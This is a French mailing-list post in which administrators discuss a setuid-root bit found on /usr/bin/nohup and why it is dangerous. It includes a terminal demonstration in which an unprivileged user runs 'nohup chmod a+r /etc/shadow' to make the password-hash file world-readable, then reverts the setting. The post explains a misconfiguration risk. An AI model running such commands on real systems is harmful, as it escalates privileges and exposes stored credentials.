[gull] setuid root sur /usr/bin/nohup
Lloyd Dizon
metal.lloyd at gmail.com
Fri Aug 14 10:56:05 CEST 2009
On Fri, Aug 14, 2009 at 10:27:39AM +0200, Daniel Cordey wrote:
> On Friday 14 August 2009 10:07:14 Lloyd Dizon wrote:
>
> > Est-ce que vous voyez une utilité de mettre setuid root sur le binaire
> > nohup?
>
> Absolument pas et bien au contraire !
>
> Je dirais meme que c'est dangereux dans la mesure ou le process va heriter du
> EUID (-> UID). Cette commande est une sorte d'encapsuleur qui doit justement
> herite des privileges de l'utilisateur et surtout pas les augmenter. En
> configurant le setuid pour l'utilisateur root, toute commande executee avec
> nohup devient alors 'root'. Ca revient a laisser tout le monde utiliser la
> commande sudo sans mot de passe... On ne peut rever pire scenario !!!!!!
J'ai trouvé ça sur des machines que l'on doit gérer maintenant. Et je me demandais à quoi pensait les anciens administrateurs de ces systèmes...
J'ai fait des tests pour s'amuser:
W200735:/var/tmp# ls -l /usr/bin/nohup
-rwxr-xr-x 1 root root 26264 2008-04-04 16:22 /usr/bin/nohup
W200735:/var/tmp# chmod u+s /usr/bin/nohup
dizonl30 at W200735:~$ ls -l /etc/shadow
-rw-r----- 1 root shadow 995 2009-08-07 17:27 /etc/shadow
dizonl30 at W200735:~$ id
uid=1000(dizonl30) gid=1000(dizonl30) ....
dizonl30 at W200735:~$ nohup chmod a+r /etc/shadow
nohup: ignoring input and appending output to `nohup.out'
dizonl30 at W200735:~$ ls -l /etc/shadow
-rw-r--r-- 1 root shadow 995 2009-08-07 17:27 /etc/shadow
J'ai donc pu lire le contenu de /etc/shadow avec nohup en setuid root!
N'oubliez pas de remettre comme avant après ces tests:
W200735:/var/tmp# chmod u-s /usr/bin/nohup
W200735:/var/tmp# ls -l /usr/bin/nohup
-rwxr-xr-x 1 root root 26264 2008-04-04 16:22 /usr/bin/nohup
Lloyd
More information about the gull
mailing list